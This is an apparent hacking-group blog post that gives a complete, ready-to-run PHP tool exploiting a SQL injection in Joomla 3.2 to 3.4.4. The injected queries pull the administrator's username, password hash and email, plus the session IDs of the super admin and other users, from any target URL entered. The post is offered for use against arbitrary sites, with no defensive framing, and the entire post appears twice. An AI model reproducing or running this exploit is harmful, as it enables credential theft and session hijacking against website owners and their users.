Pranaam to all bhai ji _/\_
Today i am going to share a simple PHP script which exploit SQL injection vulnerability in Joomla having version 3.2.* to 3.4.4
Just upload this script on your localhost (Must have PHP curl enabled in it)
Specify target name and run
if target is vulnerable, script will extract admin username, password hash and also admin session id (if super admin is logged in)
code is given below
///////////////////////////////// code starts here
<?php
session_start();
error_reporting(0);
set_time_limit(0);
/* Coded By Manish At Indishell Lab*/
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
function lhook(id) {
var e = document.getElementById(id);
if(e.style.display == \'block\')
e.style.display = \'none\';
else
e.style.display = \'block\';
}
//-->
</script>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Gujjar PCP,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table> <br>
';
?>
<div align=center>
Special Thanks to MakMan (For SQL Injection Query)<br>
<form method=post>
<input type=input name=in value="http://falana-dhimka.com/">
<input type=submit name=sm value="Start Exploitation">
<?php
function data($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
if(isset($_POST['sm']))
{
$firstq="(/*!32100select*/+1+/*!32100from*/+(/*!32100select*/+/*!32100count(*)*/,+/*!32100conCat((/*!32100select*/+(/*!32100select*/+/*!32100conCat(0x7e7e,password,0x7e7e)*/)+/*!32100from*/+/*!32100icalab_users*/+/*!32100where*/+/*!32100name*/=0x53757065722055736572+LIMIT+0,1),floor(rand(0)*2))tu+/*!32100from*/+/*!32100information_schema*/.tables+/*!32100group*/+/*!32100by*/+tu)p)";
$tar=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=".$firstq;
$dat=data($tar);
$ar0=explode("LEFT JOIN", $dat);
$ar1=explode("_users", $ar0[1]);
$ar=trim($ar1[0]);
$mainq="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e7e,(/*!00000select*/concat_ws(0x7e7e,0x6963616c6162,username,password,email)+/*!00000from*/+icalab_users+order+by+id+ASC+limit+0,1),(/*!00000select*/concat_ws(0x7e,session_id,0x6963616c6162)+/*!00000from*/+icalab_session+order+by+time+DESC+limit+0,1))as+t)``)``))";
$tarfinal=str_replace($firstq,$mainq,$tar);
$rt=str_replace("icalab",$ar,$tarfinal);
$tr=data($rt);
$ar0=explode("icalab", $tr);
$ar0[1];
if($ar0[1]!='')
{
$all=array_filter(explode("~~",$ar0[1]));
//print_r($all);die();
echo "<br> Target gone 8-)<br><br>website name:- ".trim($_POST['in'])." <br>-------------------------------<br> <br>";
echo "website super admin username is --> ".$all[1]." <br>Password Hash is --> ".$all[2]."<br>E-mail id -> ".$all[3];
echo "<br>-------------------------------<br><br>Super Admin session ID is<br>";
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+/*!32312where*/+/*!32312username*/='".$all[1]."'+limit+0,1),0x7e7e),0)";
$ses=data($sessionid);
$ar0=explode("~~", $ses);
//print_r($ar0);
echo trim($ar0[1]);
echo "<br>Other user session ID is<br>";
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+limit+0,1),0x7e7e),0)";
$ses=data($sessionid);
$ar0=explode("~~", $ses);
//print_r($ar0);
echo trim($ar0[1]);
}
}
?>
/////////////////////////////// code ends here
With Love from
Team Indishell
Today i am going to share a simple PHP script which exploit SQL injection vulnerability in Joomla having version 3.2.* to 3.4.4
Just upload this script on your localhost (Must have PHP curl enabled in it)
Specify target name and run
if target is vulnerable, script will extract admin username, password hash and also admin session id (if super admin is logged in)
code is given below
///////////////////////////////// code starts here
<?php
session_start();
error_reporting(0);
set_time_limit(0);
/* Coded By Manish At Indishell Lab*/
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
function lhook(id) {
var e = document.getElementById(id);
if(e.style.display == \'block\')
e.style.display = \'none\';
else
e.style.display = \'block\';
}
//-->
</script>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Gujjar PCP,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table> <br>
';
?>
<div align=center>
Special Thanks to MakMan (For SQL Injection Query)<br>
<form method=post>
<input type=input name=in value="http://falana-dhimka.com/">
<input type=submit name=sm value="Start Exploitation">
<?php
function data($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
if(isset($_POST['sm']))
{
$firstq="(/*!32100select*/+1+/*!32100from*/+(/*!32100select*/+/*!32100count(*)*/,+/*!32100conCat((/*!32100select*/+(/*!32100select*/+/*!32100conCat(0x7e7e,password,0x7e7e)*/)+/*!32100from*/+/*!32100icalab_users*/+/*!32100where*/+/*!32100name*/=0x53757065722055736572+LIMIT+0,1),floor(rand(0)*2))tu+/*!32100from*/+/*!32100information_schema*/.tables+/*!32100group*/+/*!32100by*/+tu)p)";
$tar=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=".$firstq;
$dat=data($tar);
$ar0=explode("LEFT JOIN", $dat);
$ar1=explode("_users", $ar0[1]);
$ar=trim($ar1[0]);
$mainq="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e7e,(/*!00000select*/concat_ws(0x7e7e,0x6963616c6162,username,password,email)+/*!00000from*/+icalab_users+order+by+id+ASC+limit+0,1),(/*!00000select*/concat_ws(0x7e,session_id,0x6963616c6162)+/*!00000from*/+icalab_session+order+by+time+DESC+limit+0,1))as+t)``)``))";
$tarfinal=str_replace($firstq,$mainq,$tar);
$rt=str_replace("icalab",$ar,$tarfinal);
$tr=data($rt);
$ar0=explode("icalab", $tr);
$ar0[1];
if($ar0[1]!='')
{
$all=array_filter(explode("~~",$ar0[1]));
//print_r($all);die();
echo "<br> Target gone 8-)<br><br>website name:- ".trim($_POST['in'])." <br>-------------------------------<br> <br>";
echo "website super admin username is --> ".$all[1]." <br>Password Hash is --> ".$all[2]."<br>E-mail id -> ".$all[3];
echo "<br>-------------------------------<br><br>Super Admin session ID is<br>";
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+/*!32312where*/+/*!32312username*/='".$all[1]."'+limit+0,1),0x7e7e),0)";
$ses=data($sessionid);
$ar0=explode("~~", $ses);
//print_r($ar0);
echo trim($ar0[1]);
echo "<br>Other user session ID is<br>";
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+limit+0,1),0x7e7e),0)";
$ses=data($sessionid);
$ar0=explode("~~", $ses);
//print_r($ar0);
echo trim($ar0[1]);
}
}
?>
/////////////////////////////// code ends here
With Love from
Team Indishell
0 comments